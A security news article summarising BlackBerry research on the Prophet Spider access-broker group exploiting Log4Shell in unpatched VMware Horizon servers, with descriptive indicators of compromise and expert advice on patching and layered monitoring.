Attacks by the initial access broker (IAB) group Prophet Spider were found to correlate with exploitation of the recently discovered Log4j vulnerability in VMware Horizon—and a number of indicators of compromise could help security teams determine if their organizations were victims of an attack.
While VMware issued a patch for Log4Shell—as well as guidance to mitigate the flaw—late last year, many implementations have gone unpatched, according to BlackBerry Research & Intelligence and Incident Response teams that discovered the Prophet Spider attacks.
“The exploit could be reliably detected by monitoring child processes of the ws_TomcatService.exe parent process, as this is the same Tomcat service used by VMware Horizon,” according to a blog penned by BlackBerry researchers. “In all observed cases, exploitation of the ws_TomcatService.exe process spawned either cmd.exe or powershell.exe as child processes.”
When the threat attackers exploited the vulnerability, the researchers wrote, they “most commonly used encoded PowerShell commands to download a second-stage payload to the victimized systems” with the payload specifics depending on the attacker’s motives and goals. The researchers pointed to cryptomining, ransomware and extortion as examples.
“While BlackBerry primarily observed the threat actors installing cryptocurrency mining software on the affected systems, Cobalt Strike beacons were also discovered in some instances,” they said.
The researchers not only observed the mass deployment of cryptocurrency mining software and Cobalt Strike beacons but also uncovered “an instance of exploitation containing tactics, techniques and procedures (TTPs) relating to the Prophet Spider IAB,” they said. “This threat group is known to compromise networks and, later, sell access to ransomware operators. We discussed a similar group called Zebra2104 in our recent report, Hunter Becomes Hunted: Zebra2104 Hides a Herd of Malware.”
They noted that one indicator that helped them attribute the event to Prophet Spider was the use of the C:\Windows\Temp\7fde\ folder path to store malicious files. “The threat actor also downloaded a copy of the wget.bin executable, which has historically been used by the group to get additional files onto infected hosts,” they said. “The IP used in the download cradle has also been previously attributed to the Prophet Spider group.”
To mitigate the exploit, Tony Lee, BlackBerry vice president of global services technical operations said, “The simple answer for mitigating steps is to patch all vulnerable instances of Log4j, along with all other vulnerabilities—however, it is never that simple.”
Lee explained, “If an organization can pay a ransom or can be turned into a cryptomining farm, they can expect to be a target.” And that means nearly every organization is at risk.
“While a robust vulnerability management program is an absolute must, it is not the only solution,” said Lee. “A layered defense that includes 24×7 monitoring, threat intel overlay, threat hunting and AI-based endpoint protection helps in quickly identifying and mitigating breaches. The faster a compromise such as this is detected and mitigated, the better the chance of dodging the follow-on ransomware attack.”
That Prophet Spider has exploited the Log4j flaw speaks to the ample opportunities it presents to would-be attackers. “When an IAB group takes interest in a vulnerability whose scope may never be known, this gives us a good indication that they see significant value in its exploitation,” the researchers said. “It’s likely that we will continue to see criminal groups exploring the opportunities of the Log4Shell vulnerability in the near future, as IT teams and users continue to scramble to address these vulnerabilities.”
But Log4j is just the latest shiny object in what promises to be a long line of exploitable vulnerabilities for IABs. “Initial access brokers leverage any opportunity to gain access to an organization,” said SCYTHE CTO Jorge Orchilles.
“They must maintain that access as they sell it and hand it off to the buyer. Today, the exploit being used is for Log4j; tomorrow it will be another,” said Orchilles. “As defenders, we want to be able to detect and respond to the inevitable exploit that will one day break through our protection.”
He noted that regardless of the exploit, security teams “can detect and respond to what happens after by testing, training and improving our people, process and security controls. This is an ever-evolving field and we must collaborate to stay ahead of the threats.”